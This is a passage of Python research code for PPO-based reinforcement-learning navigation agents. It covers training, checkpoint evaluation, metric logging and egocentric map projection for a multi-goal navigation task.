writer.add_scalar("metrics/sub_success", metrics["sub_success"], count_steps)
writer.add_scalar("metrics/episode_length", metrics["episode_length"], count_steps)
writer.add_scalar("metrics/distance_to_multi_goal", metrics["distance_to_multi_goal"], count_steps)
writer.add_scalar("metrics/percentage_success", metrics["percentage_success"], count_steps)
writer.add_scalar("train/losses_value", value_loss, count_steps)
writer.add_scalar("train/losses_policy", action_loss, count_steps)
# log stats
if update > 0 and update % self.config.LOG_INTERVAL == 0:
logger.info(
"update: {}\tfps: {:.3f}\t".format(
update, count_steps / (time.time() - t_start)
)
)
logger.info(
"update: {}\tenv-time: {:.3f}s\tpth-time: {:.3f}s\t"
"frames: {}".format(
update, env_time, pth_time, count_steps
)
)
logger.info(
"Average window size: {} {}".format(
len(window_episode_stats["count"]),
" ".join(
"{}: {:.3f}".format(k, v / deltas["count"])
for k, v in deltas.items()
if k != "count"
),
)
)
# checkpoint model
if update % self.config.CHECKPOINT_INTERVAL == 0:
self.save_checkpoint(
f"ckpt.{count_checkpoints}.pth", dict(step=count_steps)
)
count_checkpoints += 1
self.envs.close()
def _eval_checkpoint(
self,
checkpoint_path: str,
writer: TensorboardWriter,
checkpoint_index: int = 0,
) -> None:
r"""Evaluates a single checkpoint.
Args:
checkpoint_path: path of checkpoint
writer: tensorboard writer object for logging to tensorboard
checkpoint_index: index of cur checkpoint for logging
Returns:
None
"""
# Map location CPU is almost always better than mapping to a CUDA device.
ckpt_dict = self.load_checkpoint(checkpoint_path, map_location="cpu")
if self.config.EVAL.USE_CKPT_CONFIG:
config = self._setup_eval_config(ckpt_dict["config"])
else:
config = self.config.clone()
ppo_cfg = config.RL.PPO
map_config = config.RL.MAPS
config.defrost()
config.TASK_CONFIG.DATASET.SPLIT = config.EVAL.SPLIT
config.freeze()
# if len(self.config.VIDEO_OPTION) > 0 and np.random.uniform(0, 1) <= self.config.VIDEO_PROB:
if len(self.config.VIDEO_OPTION) > 0:
config.defrost()
config.TASK_CONFIG.TASK.MEASUREMENTS.append("TOP_DOWN_MAP")
config.TASK_CONFIG.TASK.MEASUREMENTS.append("COLLISIONS")
config.freeze()
logger.info(f"env config: {config}")
self.envs = construct_envs(config, get_env_class(config.ENV_NAME))
self._setup_actor_critic_agent(ppo_cfg)
self.agent.load_state_dict(ckpt_dict["state_dict"])
self.actor_critic = self.agent.actor_critic
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
current_episode_reward = torch.zeros(
self.envs.num_envs, 1, device=self.device
)
test_recurrent_hidden_states = torch.zeros(
self.actor_critic.net.num_recurrent_layers,
self.config.NUM_PROCESSES,
ppo_cfg.hidden_size,
device=self.device,
)
test_global_map = torch.zeros(
self.config.NUM_PROCESSES,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_depth,
)
test_global_map_visualization = torch.zeros(
self.config.NUM_PROCESSES,
self.config.RL.MAPS.global_map_size,
self.config.RL.MAPS.global_map_size,
3,
)
prev_actions = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device, dtype=torch.long
)
not_done_masks = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device
)
stats_episodes = dict() # dict of dicts that stores stats per episode
raw_metrics_episodes = dict()
rgb_frames = [
[] for _ in range(self.config.NUM_PROCESSES)
] # type: List[List[np.ndarray]]
if len(self.config.VIDEO_OPTION) > 0:
os.makedirs(self.config.VIDEO_DIR, exist_ok=True)
pbar = tqdm.tqdm(total=self.config.TEST_EPISODE_COUNT)
self.actor_critic.eval()
while (
len(stats_episodes) < self.config.TEST_EPISODE_COUNT
and self.envs.num_envs > 0
):
current_episodes = self.envs.current_episodes()
with torch.no_grad():
(
_,
actions,
_,
test_recurrent_hidden_states,
test_global_map,
) = self.actor_critic.act(
batch,
test_recurrent_hidden_states,
test_global_map,
prev_actions,
not_done_masks,
deterministic=False,
)
prev_actions.copy_(actions)
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [
list(x) for x in zip(*outputs)
]
batch = batch_obs(observations, device=self.device)
not_done_masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=self.device,
)
# Reset global map
#test_global_map_visualization = not_done_masks.unsqueeze(2).unsqueeze(3).cpu() * test_global_map_visualization
rewards = torch.tensor(
rewards, dtype=torch.float, device=self.device
).unsqueeze(1)
current_episode_reward += rewards
next_episodes = self.envs.current_episodes()
envs_to_pause = []
n_envs = self.envs.num_envs
for i in range(n_envs):
if (
next_episodes[i].scene_id,
next_episodes[i].episode_id,
) in stats_episodes:
envs_to_pause.append(i)
# episode ended
if not_done_masks[i].item() == 0:
pbar.update()
episode_stats = dict()
episode_stats["reward"] = current_episode_reward[i].item()
episode_stats.update(
self._extract_scalars_from_info(infos[i])
)
current_episode_reward[i] = 0
# use scene_id + episode_id as unique id for storing stats
stats_episodes[
(
current_episodes[i].scene_id,
current_episodes[i].episode_id,
)
] = episode_stats
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
raw_metrics_episodes[
current_episodes[i].scene_id + '.' +
current_episodes[i].episode_id
] = infos[i]["raw_metrics"]
if len(self.config.VIDEO_OPTION) > 0:
generate_video(
video_option=self.config.VIDEO_OPTION,
video_dir=self.config.VIDEO_DIR,
images=rgb_frames[i],
episode_id=current_episodes[i].episode_id,
checkpoint_idx=checkpoint_index,
metrics=self._extract_scalars_from_info(infos[i]),
tb_writer=writer,
)
rgb_frames[i] = []
# episode continues
elif len(self.config.VIDEO_OPTION) > 0:
grid_x, grid_y = to_grid(
map_config.coordinate_min,
map_config.coordinate_max,
map_config.global_map_size,
observations[i]['gps']
)
projection1 = draw_projection(observations[i]['rgb'], observations[i]['depth'] * 10, map_config.egocentric_map_size, map_config.global_map_size, map_config.coordinate_min, map_config.coordinate_max)
projection1 = projection1.squeeze(0).squeeze(0).permute(1, 2, 0)
projection1 = rotate_tensor(projection1.permute(2, 0, 1).unsqueeze(0), torch.tensor(-(observations[i]["compass"])).unsqueeze(0))
projection1 = projection1.squeeze(0).permute(1, 2, 0)
s = map_config.egocentric_map_size
#temp = torch.max(test_global_map_visualization[i][grid_x - math.floor(s/2):grid_x + math.ceil(s/2),grid_y - math.floor(s/2):grid_y + math.ceil(s/2),:], projection1)
#test_global_map_visualization[i][grid_x - math.floor(s/2):grid_x + math.ceil(s/2),grid_y - math.floor(s/2):grid_y + math.ceil(s/2),:] = temp
#global_map1 = rotate_tensor(test_global_map_visualization[i][grid_x - math.floor(51/2):grid_x + math.ceil(51/2),grid_y - math.floor(51/2):grid_y + math.ceil(51/2),:].permute(2, 1, 0).unsqueeze(0), torch.tensor(-(observations[i]["compass"])).unsqueeze(0)).squeeze(0).permute(1, 2, 0).numpy()
egocentric_map = torch.sum(test_global_map[i, grid_x - math.floor(51/2):grid_x+math.ceil(51/2), grid_y - math.floor(51/2):grid_y + math.ceil(51/2),:], dim=2)
frame = observations_to_image(observations[i], infos[i], actions[i].cpu().numpy())
rgb_frames[i].append(frame)
(
self.envs,
test_recurrent_hidden_states,
test_global_map,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
) = self._pause_envs(
envs_to_pause,
self.envs,
test_recurrent_hidden_states,
test_global_map,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
)
num_episodes = len(stats_episodes)
aggregated_stats = dict()
for stat_key in next(iter(stats_episodes.values())).keys():
aggregated_stats[stat_key] = (
sum([v[stat_key] for v in stats_episodes.values()])
/ num_episodes
)
for k, v in aggregated_stats.items():
logger.info(f"Average episode {k}: {v:.4f}")
step_id = checkpoint_index
if "extra_state" in ckpt_dict and "step" in ckpt_dict["extra_state"]:
step_id = ckpt_dict["extra_state"]["step"]
writer.add_scalar("eval/average_reward", aggregated_stats["reward"],
step_id,
)
metrics = {k: v for k, v in aggregated_stats.items() if k != "reward"}
writer.add_scalar("eval/distance_to_currgoal", metrics["distance_to_currgoal"], step_id)
writer.add_scalar("eval/distance_to_multi_goal", metrics["distance_to_multi_goal"], step_id)
writer.add_scalar("eval/episode_length", metrics["episode_length"], step_id)
writer.add_scalar("eval/mspl", metrics["mspl"], step_id)
writer.add_scalar("eval/pspl", metrics["pspl"], step_id)
writer.add_scalar("eval/percentage_success", metrics["percentage_success"], step_id)
writer.add_scalar("eval/success", metrics["success"], step_id)
writer.add_scalar("eval/sub_success", metrics["sub_success"], step_id)
##Dump metrics JSON
if 'RAW_METRICS' in config.TASK_CONFIG.TASK.MEASUREMENTS:
if not os.path.exists(config.TENSORBOARD_DIR_EVAL +'/metrics'):
os.mkdir(config.TENSORBOARD_DIR_EVAL +'/metrics')
with open(config.TENSORBOARD_DIR_EVAL +'/metrics/' + checkpoint_path.split('/')[-1] + '.json', 'w') as fp:
json.dump(raw_metrics_episodes, fp)
self.envs.close()
def to_grid(coordinate_min, coordinate_max, global_map_size, position):
grid_size = (coordinate_max - coordinate_min) / global_map_size
grid_x = ((coordinate_max - position[0]) / grid_size).round()
grid_y = ((position[1] - coordinate_min) / grid_size).round()
return int(grid_x), int(grid_y)
def draw_projection(image, depth, s, global_map_size, coordinate_min, coordinate_max):
image = torch.tensor(image).permute(2, 0, 1).unsqueeze(0)
depth = torch.tensor(depth).permute(2, 0, 1).unsqueeze(0)
spatial_locs, valid_inputs = _compute_spatial_locs(depth, s, global_map_size, coordinate_min, coordinate_max)
x_gp1 = _project_to_ground_plane(image, spatial_locs, valid_inputs, s)
return x_gp1
def _project_to_ground_plane(img_feats, spatial_locs, valid_inputs, s):
outh, outw = (s, s)
bs, f, HbyK, WbyK = img_feats.shape
device = img_feats.device
eps=-1e16
K = 1
# Sub-sample spatial_locs, valid_inputs according to img_feats resolution.
idxes_ss = ((torch.arange(0, HbyK, 1)*K).long().to(device), \
(torch.arange(0, WbyK, 1)*K).long().to(device))
spatial_locs_ss = spatial_locs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 2, HbyK, WbyK)
valid_inputs_ss = valid_inputs[:, :, idxes_ss[0][:, None], idxes_ss[1]] # (bs, 1, HbyK, WbyK)
valid_inputs_ss = valid_inputs_ss.squeeze(1) # (bs, HbyK, WbyK)
invalid_inputs_ss = ~valid_inputs_ss
# Filter out invalid spatial locations
invalid_spatial_locs = (spatial_locs_ss[:, 1] >= outh) | (spatial_locs_ss[:, 1] < 0 ) | \
(spatial_locs_ss[:, 0] >= outw) | (spatial_locs_ss[:, 0] < 0 ) # (bs, H, W)
invalid_writes = invalid_spatial_locs | invalid_inputs_ss
# Set the idxes for all invalid locations to (0, 0)
spatial_locs_ss[:, 0][invalid_writes] = 0
spatial_locs_ss[:, 1][invalid_writes] = 0
# Weird hack to account for max-pooling negative feature values
invalid_writes_f = rearrange(invalid_writes, 'b h w -> b () h w').float()
img_feats_masked = img_feats * (1 - invalid_writes_f) + eps * invalid_writes_f
img_feats_masked = rearrange(img_feats_masked, 'b e h w -> b e (h w)')
# Linearize ground-plane indices (linear idx = y * W + x)
linear_locs_ss = spatial_locs_ss[:, 1] * outw + spatial_locs_ss[:, 0] # (bs, H, W)
linear_locs_ss = rearrange(linear_locs_ss, 'b h w -> b () (h w)')
linear_locs_ss = linear_locs_ss.expand(-1, f, -1) # .contiguous()
proj_feats, _ = torch_scatter.scatter_max(
img_feats_masked,
linear_locs_ss,
dim=2,
dim_size=outh*outw,
)
proj_feats = rearrange(proj_feats, 'b e (h w) -> b e h w', h=outh)
# Replace invalid features with zeros
eps_mask = (proj_feats == eps).float()
proj_feats = proj_feats * (1 - eps_mask) + eps_mask * (proj_feats - eps)
return proj_feats
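# Reader note (explanatory comment added for clarity, not original logic): invalid pixels
# are routed to ground cell (0, 0) with their features replaced by eps = -1e16, so that
# scatter_max never lets an invalid write beat a real observation. Any output cell that
# still equals eps after the scatter received only invalid writes, and the final masking
# step resets exactly those cells to zero via (proj_feats - eps).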
def _compute_spatial_locs(depth_inputs, s, global_map_size, coordinate_min, coordinate_max):
bs, _, imh, imw = depth_inputs.shape
local_scale = float(coordinate_max - coordinate_min)/float(global_map_size)
cx, cy = 256./2., 256./2.
fx = fy = (256. / 2.) / np.tan(np.deg2rad(79. / 2.))
#2D image coordinates
x = rearrange(torch.arange(0, imw), 'w -> () () () w')
y = rearrange(torch.arange(imh, 0, step=-1), 'h -> () () h ()')
xx = (x - cx) / fx
yy = (y - cy) / fy
# 3D real-world coordinates (in meters)
Z = depth_inputs
X = xx * Z
Y = yy * Z
# valid_inputs = (depth_inputs != 0) & ((Y < 1) & (Y > -1))
valid_inputs = (depth_inputs != 0) & ((Y > -0.5) & (Y < 1))
# 2D ground projection coordinates (in meters)
# Note: map_scale - dimension of each grid in meters
# - depth/scale + (s-1)/2 since image convention is image y downward
# and agent is facing upwards.
x_gp = ( (X / local_scale) + (s-1)/2).round().long() # (bs, 1, imh, imw)
y_gp = (-(Z / local_scale) + (s-1)/2).round().long() # (bs, 1, imh, imw)
return torch.cat([x_gp, y_gp], dim=1), valid_inputs
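# Worked example (illustrative comment; the numbers are hypothetical, not the repository's
# config): with local_scale = 0.5 m per cell and s = 51, (s - 1) / 2 = 25, so a point 5 m
# straight ahead of the camera (X = 0, Z = 5) maps to x_gp = round(0 / 0.5 + 25) = 25 and
# y_gp = round(-5 / 0.5 + 25) = 15, i.e. ten cells toward the top of the egocentric map,
# consistent with the "agent is facing upwards" note above.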
def rotate_tensor(x_gp, heading):
sin_t = torch.sin(heading.squeeze(1))
cos_t = torch.cos(heading.squeeze(1))
A = torch.zeros(x_gp.size(0), 2, 3)
A[:, 0, 0] = cos_t
A[:, 0, 1] = sin_t
A[:, 1, 0] = -sin_t
A[:, 1, 1] = cos_t
grid = F.affine_grid(A, x_gp.size())
rotated_x_gp = F.grid_sample(x_gp, grid)
return rotated_x_gp
@baseline_registry.register_trainer(name="oracle")
class PPOTrainerO(BaseRLTrainerOracle):
r"""Trainer class for PPO algorithm
Paper: https://arxiv.org/abs/1707.06347.
"""
supported_tasks = ["Nav-v0"]
def __init__(self, config=None):
super().__init__(config)
self.actor_critic = None
self.agent = None
self.envs = None
if config is not None:
logger.info(f"config: {config}")
self._static_encoder = False
self._encoder = None
# with open('mapDictFull.pickle', 'rb') as handle:
# self.mapCache = pickle.load(handle)
def _setup_actor_critic_agent(self, ppo_cfg: Config) -> None:
r"""Sets up actor critic and agent for PPO.
Args:
ppo_cfg: config node with relevant params
Returns:
None
"""
logger.add_filehandler(self.config.LOG_FILE)
if isinstance(self.envs, VectorEnv):
self.actor_critic = BaselinePolicyOracle(
agent_type = self.config.TRAINER_NAME,
observation_space=self.envs.observation_spaces[0],
action_space=self.envs.action_spaces[0],
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION
)
else:
self.actor_critic = BaselinePolicyOracle(
agent_type = self.config.TRAINER_NAME,
observation_space=self.envs.observation_space,
action_space=self.envs.action_space,
hidden_size=ppo_cfg.hidden_size,
goal_sensor_uuid=self.config.TASK_CONFIG.TASK.GOAL_SENSOR_UUID,
device=self.device,
object_category_embedding_size=self.config.RL.OBJECT_CATEGORY_EMBEDDING_SIZE,
previous_action_embedding_size=self.config.RL.PREVIOUS_ACTION_EMBEDDING_SIZE,
use_previous_action=self.config.RL.PREVIOUS_ACTION
)
self.actor_critic.to(self.device)
self.agent = PPOOracle(
actor_critic=self.actor_critic,
clip_param=ppo_cfg.clip_param,
ppo_epoch=ppo_cfg.ppo_epoch,
num_mini_batch=ppo_cfg.num_mini_batch,
value_loss_coef=ppo_cfg.value_loss_coef,
entropy_coef=ppo_cfg.entropy_coef,
lr=ppo_cfg.lr,
eps=ppo_cfg.eps,
max_grad_norm=ppo_cfg.max_grad_norm,
use_normalized_advantage=ppo_cfg.use_normalized_advantage,
)
def save_checkpoint(
self, file_name: str, extra_state: Optional[Dict] = None
) -> None:
r"""Save checkpoint with specified name.
Args:
file_name: file name for checkpoint
Returns:
None
"""
checkpoint = {
"state_dict": self.agent.state_dict(),
"config": self.config,
}
if extra_state is not None:
checkpoint["extra_state"] = extra_state
torch.save(
checkpoint, os.path.join(self.config.CHECKPOINT_FOLDER, file_name)
)
def load_checkpoint(self, checkpoint_path: str, *args, **kwargs) -> Dict:
r"""Load checkpoint of specified path as a dict.
Args:
checkpoint_path: path of target checkpoint
*args: additional positional args
**kwargs: additional keyword args
Returns:
dict containing checkpoint info
"""
return torch.load(checkpoint_path, *args, **kwargs)
METRICS_BLACKLIST = {"top_down_map", "collisions.is_collision", "raw_metrics", "traj_metrics"}
@classmethod
def _extract_scalars_from_info(
cls, info: Dict[str, Any]
) -> Dict[str, float]:
result = {}
for k, v in info.items():
if k in cls.METRICS_BLACKLIST:
continue
if isinstance(v, dict):
result.update(
{
k + "." + subk: subv
for subk, subv in cls._extract_scalars_from_info(
v
).items()
if (k + "." + subk) not in cls.METRICS_BLACKLIST
}
)
# Things that are scalar-like will have an np.size of 1.
# Strings also have an np.size of 1, so explicitly ban those
elif np.size(v) == 1 and not isinstance(v, str):
result[k] = float(v)
return result
@classmethod
def _extract_scalars_from_infos(
cls, infos: List[Dict[str, Any]]
) -> Dict[str, List[float]]:
results = defaultdict(list)
for i in range(len(infos)):
for k, v in cls._extract_scalars_from_info(infos[i]).items():
results[k].append(v)
return results
def _collect_rollout_step(
self, rollouts, current_episode_reward, running_episode_stats
):
pth_time = 0.0
env_time = 0.0
t_sample_action = time.time()
# sample actions
with torch.no_grad():
step_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
(
values,
actions,
actions_log_probs,
recurrent_hidden_states,
) = self.actor_critic.act(
step_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
)
pth_time += time.time() - t_sample_action
t_step_env = time.time()
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [list(x) for x in zip(*outputs)]
env_time += time.time() - t_step_env
t_update_stats = time.time()
batch = batch_obs(observations, device=self.device)
rewards = torch.tensor(
rewards, dtype=torch.float, device=current_episode_reward.device
)
rewards = rewards.unsqueeze(1)
masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=current_episode_reward.device,
)
current_episode_reward += rewards
running_episode_stats["reward"] += (1 - masks) * current_episode_reward
running_episode_stats["count"] += 1 - masks
for k, v in self._extract_scalars_from_infos(infos).items():
v = torch.tensor(
v, dtype=torch.float, device=current_episode_reward.device
).unsqueeze(1)
if k not in running_episode_stats:
running_episode_stats[k] = torch.zeros_like(
running_episode_stats["count"]
)
running_episode_stats[k] += (1 - masks) * v
current_episode_reward *= masks
if self._static_encoder:
with torch.no_grad():
batch["visual_features"] = self._encoder(batch)
rollouts.insert(
batch,
recurrent_hidden_states,
actions,
actions_log_probs,
values,
rewards,
masks,
)
pth_time += time.time() - t_update_stats
return pth_time, env_time, self.envs.num_envs
def _update_agent(self, ppo_cfg, rollouts):
t_update_model = time.time()
with torch.no_grad():
last_observation = {
k: v[rollouts.step] for k, v in rollouts.observations.items()
}
next_value = self.actor_critic.get_value(
last_observation,
rollouts.recurrent_hidden_states[rollouts.step],
rollouts.prev_actions[rollouts.step],
rollouts.masks[rollouts.step],
).detach()
rollouts.compute_returns(
next_value, ppo_cfg.use_gae, ppo_cfg.gamma, ppo_cfg.tau
)
value_loss, action_loss, dist_entropy = self.agent.update(rollouts)
rollouts.after_update()
return (
time.time() - t_update_model,
value_loss,
action_loss,
dist_entropy,
)
def train(self) -> None:
r"""Main method for training PPO.
Returns:
None
"""
self.envs = construct_envs(
self.config, get_env_class(self.config.ENV_NAME)
)
ppo_cfg = self.config.RL.PPO
self.device = (
torch.device("cuda", self.config.TORCH_GPU_ID)
if torch.cuda.is_available()
else torch.device("cpu")
)
if not os.path.isdir(self.config.CHECKPOINT_FOLDER):
os.makedirs(self.config.CHECKPOINT_FOLDER)
self._setup_actor_critic_agent(ppo_cfg)
logger.info(
"agent number of parameters: {}".format(
sum(param.numel() for param in self.agent.parameters())
)
)
rollouts = RolloutStorageOracle(
ppo_cfg.num_steps,
self.envs.num_envs,
self.envs.observation_spaces[0],
self.envs.action_spaces[0],
ppo_cfg.hidden_size,
)
rollouts.to(self.device)
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
for sensor in rollouts.observations:
rollouts.observations[sensor][0].copy_(batch[sensor])
# batch and observations may contain shared PyTorch CUDA
# tensors. We must explicitly clear them here otherwise
# they will be kept in memory for the entire duration of training!
batch = None
observations = None
current_episode_reward = torch.zeros(self.envs.num_envs, 1)
running_episode_stats = dict(
count=torch.zeros(self.envs.num_envs, 1),
reward=torch.zeros(self.envs.num_envs, 1),
)
window_episode_stats = defaultdict(
lambda: deque(maxlen=ppo_cfg.reward_window_size)
)
t_start = time.time()
env_time = 0
pth_time = 0
count_steps = 0
count_checkpoints = 0
lr_scheduler = LambdaLR(
optimizer=self.agent.optimizer,
lr_lambda=lambda x: linear_decay(x, self.config.NUM_UPDATES),
)
with TensorboardWriter(
self.config.TENSORBOARD_DIR, flush_secs=self.flush_secs
) as writer:
for update in range(self.config.NUM_UPDATES):
if ppo_cfg.use_linear_lr_decay:
lr_scheduler.step()
if ppo_cfg.use_linear_clip_decay:
self.agent.clip_param = ppo_cfg.clip_param * linear_decay(
update, self.config.NUM_UPDATES
)
for step in range(ppo_cfg.num_steps):
(
delta_pth_time,
delta_env_time,
delta_steps,
) = self._collect_rollout_step(
rollouts, current_episode_reward, running_episode_stats
)
pth_time += delta_pth_time
env_time += delta_env_time
count_steps += delta_steps
(
delta_pth_time,
value_loss,
action_loss,
dist_entropy,
) = self._update_agent(ppo_cfg, rollouts)
pth_time += delta_pth_time
for k, v in running_episode_stats.items():
window_episode_stats[k].append(v.clone())
deltas = {
k: (
(v[-1] - v[0]).sum().item()
if len(v) > 1
else v[0].sum().item()
)
for k, v in window_episode_stats.items()
}
deltas["count"] = max(deltas["count"], 1.0)
writer.add_scalar(
"train/reward", deltas["reward"] / deltas["count"], count_steps
)
writer.add_scalar(
"train/learning_rate", lr_scheduler._last_lr[0], count_steps
)
total_actions = rollouts.actions.shape[0] * rollouts.actions.shape[1]
total_found_actions = int(torch.sum(rollouts.actions == 0).cpu().numpy())
total_forward_actions = int(torch.sum(rollouts.actions == 1).cpu().numpy())
total_left_actions = int(torch.sum(rollouts.actions == 2).cpu().numpy())
total_right_actions = int(torch.sum(rollouts.actions == 3).cpu().numpy())
total_look_up_actions = int(torch.sum(rollouts.actions == 4).cpu().numpy())
total_look_down_actions = int(torch.sum(rollouts.actions == 5).cpu().numpy())
assert total_actions == (total_found_actions + total_forward_actions +
total_left_actions + total_right_actions + total_look_up_actions +
total_look_down_actions
)
writer.add_scalar(
"train/found_action_prob", total_found_actions/total_actions, count_steps
)
writer.add_scalar(
"train/forward_action_prob", total_forward_actions/total_actions, count_steps
)
writer.add_scalar(
"train/left_action_prob", total_left_actions/total_actions, count_steps
)
writer.add_scalar(
"train/right_action_prob", total_right_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_up_action_prob", total_look_up_actions/total_actions, count_steps
)
writer.add_scalar(
"train/look_down_action_prob", total_look_down_actions/total_actions, count_steps
)
metrics = {
k: v / deltas["count"]
for k, v in deltas.items()
if k not in {"reward", "count"}
}
if len(metrics) > 0:
writer.add_scalar("metrics/distance_to_currgoal", metrics["distance_to_currgoal"], count_steps)
writer.add_scalar("metrics/success", metrics["success"], count_steps)
writer.add_scalar("metrics/sub_success", metrics["sub_success"], count_steps)
writer.add_scalar("metrics/episode_length", metrics["episode_length"], count_steps)
writer.add_scalar("metrics/distance_to_multi_goal", metrics["distance_to_multi_goal"], count_steps)
writer.add_scalar("metrics/percentage_success", metrics["percentage_success"], count_steps)
writer.add_scalar("train/losses_value", value_loss, count_steps)
writer.add_scalar("train/losses_policy", action_loss, count_steps)
# log stats
if update > 0 and update % self.config.LOG_INTERVAL == 0:
logger.info(
"update: {}\tfps: {:.3f}\t".format(
update, count_steps / (time.time() - t_start)
)
)
logger.info(
"update: {}\tenv-time: {:.3f}s\tpth-time: {:.3f}s\t"
"frames: {}".format(
update, env_time, pth_time, count_steps
)
)
logger.info(
"Average window size: {} {}".format(
len(window_episode_stats["count"]),
" ".join(
"{}: {:.3f}".format(k, v / deltas["count"])
for k, v in deltas.items()
if k != "count"
),
)
)
# checkpoint model
if update % self.config.CHECKPOINT_INTERVAL == 0:
self.save_checkpoint(
f"ckpt.{count_checkpoints}.pth", dict(step=count_steps)
)
count_checkpoints += 1
self.envs.close()
def _eval_checkpoint(
self,
checkpoint_path: str,
writer: TensorboardWriter,
checkpoint_index: int = 0,
) -> None:
r"""Evaluates a single checkpoint.
Args:
checkpoint_path: path of checkpoint
writer: tensorboard writer object for logging to tensorboard
checkpoint_index: index of cur checkpoint for logging
Returns:
None
"""
# Map location CPU is almost always better than mapping to a CUDA device.
ckpt_dict = self.load_checkpoint(checkpoint_path, map_location="cpu")
if self.config.EVAL.USE_CKPT_CONFIG:
config = self._setup_eval_config(ckpt_dict["config"])
else:
config = self.config.clone()
ppo_cfg = config.RL.PPO
config.defrost()
config.TASK_CONFIG.DATASET.SPLIT = config.EVAL.SPLIT
config.freeze()
if len(self.config.VIDEO_OPTION) > 0:
config.defrost()
config.TASK_CONFIG.TASK.MEASUREMENTS.append("TOP_DOWN_MAP")
config.TASK_CONFIG.TASK.MEASUREMENTS.append("COLLISIONS")
config.freeze()
logger.info(f"env config: {config}")
self.envs = construct_envs(config, get_env_class(config.ENV_NAME))
self._setup_actor_critic_agent(ppo_cfg)
self.agent.load_state_dict(ckpt_dict["state_dict"])
self.actor_critic = self.agent.actor_critic
observations = self.envs.reset()
batch = batch_obs(observations, device=self.device)
current_episode_reward = torch.zeros(
self.envs.num_envs, 1, device=self.device
)
test_recurrent_hidden_states = torch.zeros(
self.actor_critic.net.num_recurrent_layers,
self.config.NUM_PROCESSES,
ppo_cfg.hidden_size,
device=self.device,
)
prev_actions = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device, dtype=torch.long
)
not_done_masks = torch.zeros(
self.config.NUM_PROCESSES, 1, device=self.device
)
stats_episodes = dict() # dict of dicts that stores stats per episode
raw_metrics_episodes = dict()
traj_metrics_episodes = dict()
rgb_frames = [
[] for _ in range(self.config.NUM_PROCESSES)
] # type: List[List[np.ndarray]]
if len(self.config.VIDEO_OPTION) > 0:
os.makedirs(self.config.VIDEO_DIR, exist_ok=True)
pbar = tqdm.tqdm(total=self.config.TEST_EPISODE_COUNT)
self.actor_critic.eval()
while (
len(stats_episodes) < self.config.TEST_EPISODE_COUNT
and self.envs.num_envs > 0
):
current_episodes = self.envs.current_episodes()
with torch.no_grad():
(
_,
actions,
_,
test_recurrent_hidden_states,
) = self.actor_critic.act(
batch,
test_recurrent_hidden_states,
prev_actions,
not_done_masks,
deterministic=False,
)
prev_actions.copy_(actions)
outputs = self.envs.step([a[0].item() for a in actions])
observations, rewards, dones, infos = [
list(x) for x in zip(*outputs)
]
batch = batch_obs(observations, device=self.device)
not_done_masks = torch.tensor(
[[0.0] if done else [1.0] for done in dones],
dtype=torch.float,
device=self.device,
)
rewards = torch.tensor(
rewards, dtype=torch.float, device=self.device
).unsqueeze(1)
current_episode_reward += rewards
next_episodes = self.envs.current_episodes()
envs_to_pause = []
n_envs = self.envs.num_envs
for i in range(n_envs):
if (
next_episodes[i].scene_id,
next_episodes[i].episode_id,
) in stats_episodes:
envs_to_pause.append(i)
# episode ended
if not_done_masks[i].item() == 0:
pbar.update()
episode_stats = dict()
episode_stats["reward"] = current_episode_reward[i].item()
episode_stats.update(
self._extract_scalars_from_info(infos[i])
)
current_episode_reward[i] = 0
# use scene_id + episode_id as unique id for storing stats
stats_episodes[
(
current_episodes[i].scene_id,
current_episodes[i].episode_id,
)
] = episode_stats
"""
raw_metrics_episodes[
current_episodes[i].scene_id + '.' +
current_episodes[i].episode_id
] = infos[i]["raw_metrics"]
"""
# traj_metrics_episodes[
# current_episodes[i].scene_id + '.' +
# current_episodes[i].episode_id
# ] = infos[i]["traj_metrics"]
if len(self.config.VIDEO_OPTION) > 0:
generate_video(
video_option=self.config.VIDEO_OPTION,
video_dir=self.config.VIDEO_DIR,
images=rgb_frames[i],
episode_id=current_episodes[i].episode_id,
checkpoint_idx=checkpoint_index,
metrics=self._extract_scalars_from_info(infos[i]),
tb_writer=writer,
)
# cv2.imwrite(config.VIDEO_DIR + '/' + current_episodes[i].episode_id + '.jpg', rgb_frames[i][-1])
rgb_frames[i] = []
# episode continues
elif len(self.config.VIDEO_OPTION) > 0:
frame = observations_to_image(observations[i], infos[i], actions[i].cpu().numpy())
rgb_frames[i].append(frame)
(
self.envs,
test_recurrent_hidden_states,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
) = self._pause_envs(
envs_to_pause,
self.envs,
test_recurrent_hidden_states,
not_done_masks,
current_episode_reward,
prev_actions,
batch,
rgb_frames,
)
num_episodes = len(stats_episodes)
aggregated_stats = dict()
for stat_key in next(iter(stats_episodes.values())).keys():
aggregated_stats[stat_key] = (
sum([v[stat_key] for v in stats_episodes.values()])
/ num_episodes
)
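        # Illustrative sketch of the aggregation above (hypothetical values):
        #   stats_episodes = {("sceneA", "0"): {"reward": 1.0, "success": 1.0},
        #                     ("sceneB", "3"): {"reward": 3.0, "success": 0.0}}
        # yields aggregated_stats == {"reward": 2.0, "success": 0.5}, i.e. a per-key
        # mean over all evaluated episodes.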
